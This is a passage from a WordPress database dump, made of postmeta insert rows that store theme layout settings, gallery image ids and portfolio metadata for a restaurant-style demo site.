0'),(32248,2627,'mkdf_disable_vertical_header_background_image_meta','no'),(32249,2627,'mkdf_disable_header_widget_areas_meta','no'),(32250,2627,'mkdf_title_area_type_meta','attika'),(32251,2627,'_dp_original','1182'),(32252,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32253,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32254,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32255,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32256,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32257,2646,'_wp_page_template','default'),(32258,2646,'slide_template','default'),(32259,2646,'_wpb_vc_js_status','true'),(32260,2646,'mkdf_page_content_behind_header_meta','no'),(32261,2646,'mkdf_page_content_padding','100px 0 120px 0'),(32262,2646,'mkdf_page_content_padding_mobile','100px 0 120px 0'),(32263,2646,'mkdf_disable_vertical_header_background_image_meta','no'),(32264,2646,'mkdf_disable_header_widget_areas_meta','no'),(32265,2646,'mkdf_title_area_type_meta','attika'),(32266,2646,'_dp_original','2457'),(32267,2652,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32268,2652,'_wp_page_template','default'),(32269,2652,'slide_template','default'),(32270,2652,'_wpb_vc_js_status','true'),(32271,2652,'mkdf_page_content_behind_header_meta','no'),(32272,2652,'mkdf_disable_vertical_header_background_image_meta','no'),(32273,2652,'mkdf_disable_header_widget_areas_meta','no'),(32274,2652,'mkdf_disable_header_meta','yes'),(32275,2652,'mkdf_show_title_area_meta','no'),(32276,2652,'mkdf_disable_footer_meta','yes'),(32277,2652,'mkdf_page_content_padding','0'),(32278,3075,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32279,3075,'_thumbnail_id','121'),(32280,3075,'mkdf_page_content_behind_header_meta','no'),(32281,3075,'mkdf_page_content_padding','115px 0 100px 0'),(32282,3075,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32283,3075,'portfolio_single_back_to_link','81'),(32284,3075,'mkdf_disable_vertical_header_background_image_meta','no'),(32285,3075,'mkdf_disable_header_widget_areas_meta','no'),(32286,3075,'slide_template','default'),(32287,3075,'_wpb_vc_js_status','false'),(32288,3075,'mkdf-portfolio-image-gallery','1903,1902,1901'),(32289,3075,'mkdf_portfolio_single_template_meta','images'),(32290,3075,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32291,3075,'_wp_old_slug','h1-1'),(32292,3076,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32293,3076,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32294,3076,'_thumbnail_id','137'),(32295,3076,'mkdf_page_content_behind_header_meta','no'),(32296,3076,'mkdf_page_content_padding','115px 0 100px 0'),(32297,3076,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32298,3076,'portfolio_single_back_to_link','81'),(32299,3076,'mkdf_disable_vertical_header_background_image_meta','no'),(32300,3076,'mkdf_disable_header_widget_areas_meta','no'),(32301,3076,'slide_template','default'),(32302,3076,'_wpb_vc_js_status','true'),(32303,3076,'_dp_original','104'),(32304,3076,'mkdf-portfolio-image-gallery','567,566,565'),(32305,3076,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32306,3076,'mkdf_portfolio_single_template_meta','small-images'),(32307,3076,'_wp_old_slug','h1-2'),(32308,3077,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32309,3077,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32310,3077,'_thumbnail_id','138'),(32311,3077,'mkdf_page_content_behind_header_meta','no'),(32312,3077,'mkdf_page_content_padding','115px 0 100px 0'),(32313,3077,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32314,3077,'portfolio_single_back_to_link','81'),(32315,3077,'mkdf_disable_vertical_header_background_image_meta','no'),(32316,3077,'mkdf_disable_header_widget_areas_meta','no'),(32317,3077,'slide_template','default'),(32318,3077,'_wpb_vc_js_status','true'),(32319,3077,'_dp_original','104'),(32320,3077,'mkdf-portfolio-image-gallery','1901,1902,1903'),(32321,3077,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32322,3077,'mkdf_portfolio_single_template_meta','slider'),(32323,3077,'_wp_old_slug','h1-3'),(32324,3077,'_wp_old_slug','homemade-dining'),(32325,3078,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32326,3078,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32327,3078,'_thumbnail_id','571'),(32328,3078,'mkdf_page_content_behind_header_meta','no'),(32329,3078,'mkdf_page_content_padding','115px 0 100px 0'),(32330,3078,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32331,3078,'portfolio_single_back_to_link','569'),(32332,3078,'mkdf_disable_vertical_header_background_image_meta','no'),(32333,3078,'mkdf_disable_header_widget_areas_meta','no'),(32334,3078,'slide_template','default'),(32335,3078,'_wpb_vc_js_status','true'),(32336,3078,'mkdf-portfolio-image-gallery','565,566,567'),(32337,3078,'mkdf_portfolio_single_template_meta','small-slider'),(32338,3078,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32339,3078,'_dp_original','104'),(32340,3078,'_wp_old_slug','h8-1'),(32341,3079,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32342,3079,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32343,3079,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32344,3079,'mkdf_page_content_behind_header_meta','no'),(32345,3079,'mkdf_page_content_padding','115px 0 100px 0'),(32346,3079,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32347,3079,'portfolio_single_back_to_link','569'),(32348,3079,'mkdf_disable_vertical_header_background_image_meta','no'),(32349,3079,'mkdf_disable_header_widget_areas_meta','no'),(32350,3079,'slide_template','default'),(32351,3079,'_wpb_vc_js_status','true'),(32352,3079,'mkdf-portfolio-image-gallery','567,566,565'),(32353,3079,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32354,3079,'mkdf_portfolio_single_template_meta','gallery'),(32355,3079,'_dp_original','136'),(32357,3079,'_wp_old_slug','h8-2'),(32358,3080,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32359,3080,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32360,3080,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32361,3080,'_thumbnail_id','584'),(32362,3080,'mkdf_page_content_behind_header_meta','no'),(32363,3080,'mkdf_page_content_padding','115px 0 100px 0'),(32364,3080,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32365,3080,'portfolio_single_back_to_link','569'),(32366,3080,'mkdf_disable_vertical_header_background_image_meta','no'),(32367,3080,'mkdf_disable_header_widget_areas_meta','no'),(32368,3080,'slide_template','default'),(32369,3080,'_wpb_vc_js_status','true'),(32370,3080,'mkdf-portfolio-image-gallery','567,566,565'),(32371,3080,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32372,3080,'mkdf_portfolio_single_template_meta','small-images'),(32373,3080,'_dp_original','141'),(32374,3080,'_wp_old_slug','h8-3'),(32375,3081,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32376,3081,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32377,3081,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32378,3081,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32379,3081,'_thumbnail_id','589'),(32380,3081,'mkdf_page_content_behind_header_meta','no'),(32381,3081,'mkdf_page_content_padding','115px 0 100px 0'),(32382,3081,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32383,3081,'portfolio_single_back_to_link','569'),(32384,3081,'mkdf_disable_vertical_header_background_image_meta','no'),(32385,3081,'mkdf_disable_header_widget_areas_meta','no'),(32386,3081,'slide_template','default'),(32387,3081,'_wpb_vc_js_status','true'),(32388,3081,'mkdf-portfolio-image-gallery','567,566,565'),(32389,3081,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32390,3081,'mkdf_portfolio_single_template_meta','masonry'),(32391,3081,'_dp_original','583'),(32392,3081,'_wp_old_slug','h8-4'),(32393,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32394,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32395,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32396,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32397,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32398,3082,'_thumbnail_id','591'),(32399,3082,'mkdf_page_content_behind_header_meta','no'),(32400,3082,'mkdf_page_content_padding','115px 0 100px 0'),(32401,3082,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32402,3082,'portfolio_single_back_to_link','569'),(32403,3082,'mkdf_disable_vertical_header_background_image_meta','no'),(32404,3082,'mkdf_disable_header_widget_areas_meta','no'),(32405,3082,'slide_template','default'),(32406,3082,'_wpb_vc_js_status','true'),(32407,3082,'mkdf-portfolio-image-gallery','567,566,565'),(32408,3082,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32409,3082,'mkdf_portfolio_single_template_meta','slider'),(32410,3082,'_dp_original','588'),(32411,3082,'_wp_old_slug','h8-5'),(32412,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32413,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32414,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32415,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32416,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32417,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32418,3083,'mkdf_page_content_behind_header_meta','no'),(32419,3083,'mkdf_page_content_padding','115px 0 100px 0'),(32420,3083,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32421,3083,'portfolio_single_back_to_link','569'),(32422,3083,'mkdf_disable_vertical_header_background_image_meta','no'),(32423,3083,'mkdf_disable_header_widget_areas_meta','no'),(32424,3083,'slide_template','default'),(32425,3083,'_wpb_vc_js_status','true'),(32426,3083,'mkdf-portfolio-image-gallery','567,566,565'),(32427,3083,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32428,3083,'mkdf_portfolio_single_template_meta','small-slider'),(32429,3083,'_dp_original','590'),(32430,3083,'_thumbnail_id','594'),(32431,3083,'_wp_old_slug','h8-6'),(32432,618,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32433,618,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32434,618,'mkdf_page_content_behind_header_meta','no'),(32435,618,'mkdf_page_content_padding','115px 0 100px 0'),(32436,618,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32437,618,'portfolio_single_back_to_link','610'),(32438,618,'mkdf_disable_vertical_header_background_image_meta','no'),(32439,618,'mkdf_disable_header_widget_areas_meta','no'),(32440,618,'slide_template','default'),(32441,618,'_wpb_vc_js_status','false'),(32442,618,'mkdf-portfolio-image-gallery','565,566,567'),(32443,618,'mkdf_portfolio_single_template_meta','images'),(32444,618,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32445,618,'_dp_original','104'),(32446,618,'_thumbnail_id','1095'),(32447,618,'_wp_old_slug','h6-1'),(32448,618,'_wp_old_slug','cold-raspberry-soup'),(32449,3084,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32450,3084,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32451,3084,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32452,3084,'mkdf_page_content_behind_header_meta','no'),(32453,3084,'mkdf_page_content_padding','115px 0 100px 0'),(32454,3084,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32455,3084,'portfolio_single_back_to_link','610'),(32456,3084,'mkdf_disable_vertical_header_background_image_meta','no'),(32457,3084,'mkdf_disable_header_widget_areas_meta','no'),(32458,3084,'slide_template','default'),(32459,3084,'_wpb_vc_js_status','true'),(32460,3084,'mkdf-portfolio-image-gallery','567,566,565'),(32461,3084,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32462,3084,'mkdf_portfolio_single_template_meta','small-images'),(32463,3084,'_dp_original','136'),(32464,3084,'_thumbnail_id','1096'),(32465,3084,'_wp_old_slug','h6-2'),(32466,3085,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32467,3085,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32468,3085,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32469,3085,'mkdf_page_content_behind_header_meta','no'),(32470,3085,'mkdf_page_content_padding','115px 0 100px 0'),(32471,3085,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32472,3085,'portfolio_single_back_to_link','610'),(32473,3085,'mkdf_disable_vertical_header_background_image_meta','no'),(32474,3085,'mkdf_disable_header_widget_areas_meta','no'),(32475,3085,'slide_template','default'),(32476,3085,'_wpb_vc_js_status','true'),(32477,3085,'mkdf-portfolio-image-gallery','567,566,565'),(32478,3085,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32479,3085,'mkdf_portfolio_single_template_meta','slider'),(32480,3085,'_dp_original','141'),(32481,3085,'_thumbnail_id','1098'),(32482,3085,'_wp_old_slug','h6-3'),(32483,3085,'_wp_old_slug','that-croissant'),(32484,3086,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32485,3086,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32486,3086,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32487,3086,'mkdf_page_content_behind_header_meta','no'),(32488,3086,'mkdf_page_content_padding','115px 0 100px 0'),(32489,3086,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32490,3086,'portfolio_single_back_to_link','610'),(32491,3086,'mkdf_disable_vertical_header_background_image_meta','no'),(32492,3086,'mkdf_disable_header_widget_areas_meta','no'),(32493,3086,'slide_template','default'),(32494,3086,'_wpb_vc_js_status','true'),(32495,3086,'mkdf-portfolio-image-gallery','565,566,567'),(32496,3086,'mkdf_portfolio_single_template_meta','small-slider'),(32497,3086,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32498,3086,'_dp_original','568'),(32499,3086,'_thumbnail_id','1097'),(32500,3086,'_wp_old_slug','h6-4'),(32501,3086,'_wp_old_slug','cream-soup'),(32502,3087,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32503,3087,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32504,3087,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32505,3087,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32506,3087,'mkdf_page_content_behind_header_meta','no'),(32507,3087,'mkdf_page_content_padding','115px 0 100px 0'),(32508,3087,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32509,3087,'portfolio_single_back_to_link','610'),(32510,3087,'mkdf_disable_vertical_header_background_image_meta','no'),(32511,3087,'mkdf_disable_header_widget_areas_meta','no'),(32512,3087,'slide_template','default'),(32513,3087,'_wpb_vc_js_status','true'),(32514,3087,'mkdf-portfolio-image-gallery','567,566,565'),(32515,3087,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32516,3087,'mkdf_portfolio_single_template_meta','gallery'),(32517,3087,'_dp_original','580'),(32518,3087,'_thumbnail_id','1099'),(32519,3087,'_wp_old_slug','h6-5'),(32520,3088,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32521,3088,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32522,3088,'mkdf_page_content_behind_header_meta','no'),(32523,3088,'mkdf_page_content_padding','115px 0 100px 0'),(32524,3088,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32525,3088,'portfolio_single_back_to_link','610'),(32526,3088,'mkdf_disable_vertical_header_background_image_meta','no'),(32527,3088,'mkdf_disable_header_widget_areas_meta','no'),(32528,3088,'slide_template','default'),(32529,3088,'_wpb_vc_js_status','false'),(32530,3088,'mkdf-portfolio-image-gallery','565,566,567'),(32531,3088,'mkdf_portfolio_single_template_meta','images'),(32532,3088,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32533,3088,'_dp_original','104'),(32534,3088,'_thumbnail_id','1101'),(32535,3088,'_wp_old_slug','h6-7'),(32536,3089,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32537,3089,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32538,3089,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32539,3089,'mkdf_page_content_behind_header_meta','no'),(32540,3089,'mkdf_page_content_padding','115px 0 100px 0'),(32541,3089,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32542,3089,'portfolio_single_back_to_link','610'),(32543,3089,'mkdf_disable_vertical_header_background_image_meta','no'),(32544,3089,'mkdf_disable_header_widget_areas_meta','no'),(32545,3089,'slide_template','default'),(32546,3089,'_wpb_vc_js_status','true'),(32547,3089,'mkdf-portfolio-image-gallery','567,566,565'),(32548,3089,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32549,3089,'mkdf_portfolio_single_template_meta','small-images'),(32550,3089,'_dp_original','136'),(32551,3089,'_thumbnail_id','1121'),(32552,3089,'_wp_old_slug','h6-6'),(32553,3090,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32554,3090,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32555,3090,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32556,3090,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32557,3090,'mkdf_page_content_behind_header_meta','no'),(32558,3090,'mkdf_page_content_padding','115px 0 100px 0'),(32559,3090,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32560,3090,'portfolio_single_back_to_link','610'),(32561,3090,'mkdf_disable_vertical_header_background_image_meta','no'),(32562,3090,'mkdf_disable_header_widget_areas_meta','no'),(32563,3090,'slide_template','default'),(32564,3090,'_wpb_vc_js_status','true'),(32565,3090,'mkdf-portfolio-image-gallery','567,566,565'),(32566,3090,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32567,3090,'mkdf_portfolio_single_template_meta','small-images'),(32568,3090,'_dp_original','649'),(32569,3090,'_thumbnail_id','1102'),(32570,3090,'_wp_old_slug','h6-8'),(32571,3091,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32572,3091,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32573,3091,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32574,3091,'mkdf_page_content_behind_header_meta','no'),(32575,3091,'mkdf_page_content_padding','115px 0 100px 0'),(32576,3091,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32577,3091,'portfolio_single_back_to_link','610'),(32578,3091,'mkdf_disable_vertical_header_background_image_meta','no'),(32579,3091,'mkdf_disable_header_widget_areas_meta','no'),(32580,3091,'slide_template','default'),(32581,3091,'_wpb_vc_js_status','false'),(32582,3091,'mkdf-portfolio-image-gallery','565,566,567'),(32583,3091,'mkdf_portfolio_single_template_meta','images'),(32584,3091,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32585,3091,'_dp_original','648'),(32586,3091,'_thumbnail_id','1103'),(32587,3091,'_wp_old_slug','h6-9'),(32588,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32589,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32590,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32591,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32592,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32593,2843,'_wp_page_template','full-width.php'),(32594,2843,'slide_template','default'),(32595,2843,'_wpb_vc_js_status','true'),(32596,2843,'mkdf_page_content_behind_header_meta','no'),(32597,2843,'mkdf_page_content_padding','30px 30px 50px 30px'),(32598,2843,'mkdf_page_content_padding_mobile','30px 30px 50px 30px'),(32599,2843,'mkdf_disable_vertical_header_background_image_meta','no'),(32600,2843,'mkdf_disable_header_widget_areas_meta','no'),(32601,2843,'mkdf_title_area_type_meta','attika'),(32602,2843,'_dp_original','1192'),(32603,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32604,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32605,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32606,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32607,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32608,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32609,2857,'_wp_page_template','full-width.php'),(32610,2857,'slide_template','default'),(32611,2857,'_wpb_vc_js_status','true'),(32612,2857,'mkdf_page_content_behind_header_meta','no'),(32613,2857,'mkdf_page_content_padding','30px 30px 50px 30px'),(32614,2857,'mkdf_page_content_padding_mobile','30px 30px 50px 30px'),(32615,2857,'mkdf_disable_vertical_header_background_image_meta','no'),(32616,2857,'mkdf_disable_header_widget_areas_meta','no'),(32617,2857,'mkdf_title_area_type_meta','attika'),(32618,2857,'_dp_original','2843'),(32619,3092,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32620,3092,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52275,4373,'_menu_item_object_id','4373'),(32622,3092,'mkdf_page_content_behind_header_meta','no'),(32623,3092,'mkdf_page_content_padding','115px 0 100px 0'),(32624,3092,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32625,3092,'portfolio_single_back_to_link','664'),(32626,3092,'mkdf_disable_vertical_header_background_image_meta','no'),(32627,3092,'mkdf_disable_header_widget_areas_meta','no'),(32628,3092,'slide_template','default'),(32629,3092,'_wpb_vc_js_status','false'),(32630,3092,'mkdf-portfolio-image-gallery','565,566,567'),(32631,3092,'mkdf_portfolio_single_template_meta','images'),(32632,3092,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32633,3092,'_dp_original','104'),(32634,3092,'_wp_old_slug','h4-1'),(32635,3093,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32636,3093,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32637,3093,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52273,4373,'_menu_item_type','custom'),(32639,3093,'mkdf_page_content_behind_header_meta','no'),(32640,3093,'mkdf_page_content_padding','115px 0 100px 0'),(32641,3093,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32642,3093,'portfolio_single_back_to_link','664'),(32643,3093,'mkdf_disable_vertical_header_background_image_meta','no'),(32644,3093,'mkdf_disable_header_widget_areas_meta','no'),(32645,3093,'slide_template','default'),(32646,3093,'_wpb_vc_js_status','true'),(32647,3093,'mkdf-portfolio-image-gallery','567,566,565'),(32648,3093,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32649,3093,'mkdf_portfolio_single_template_meta','small-images'),(32650,3093,'_dp_original','136'),(32651,3093,'_wp_old_slug','h4-2'),(32652,3094,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32653,3094,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32654,3094,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32656,3094,'mkdf_page_content_behind_header_meta','no'),(32657,3094,'mkdf_page_content_padding','115px 0 100px 0'),(32658,3094,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32659,3094,'portfolio_single_back_to_link','664'),(32660,3094,'mkdf_disable_vertical_header_background_image_meta','no'),(32661,3094,'mkdf_disable_header_widget_areas_meta','no'),(32662,3094,'slide_template','default'),(32663,3094,'_wpb_vc_js_status','true'),(32664,3094,'mkdf-portfolio-image-gallery','567,566,565'),(32665,3094,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(32666,3094,'mkdf_portfolio_single_template_meta','slider'),(32667,3094,'_dp_original','141'),(32668,3094,'_wp_old_slug','h4-3'),(32669,3095,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32670,3095,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32671,3095,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32672,3095,'_thumbnail_id','1059'),(32673,3095,'mkdf_page_content_behind_header_meta','no'),(32674,3095,'mkdf_page_content_padding','115px 0 100px 0'),(32675,3095,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(32676,3095,'portfolio_single_back_to_link','84'),(32677,3095,'mkdf_disable_vertical_header_background_image_meta','no'),(32678,3095,'mkdf_disable_header_widget_areas_meta','no'),(32679,3095,'slide_template','default'),(32680,3095,'_wpb_vc_js_status','true'),(32681,3095,'mkdf-portfolio-image-gallery','567,566,565'),(32682,3095,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John 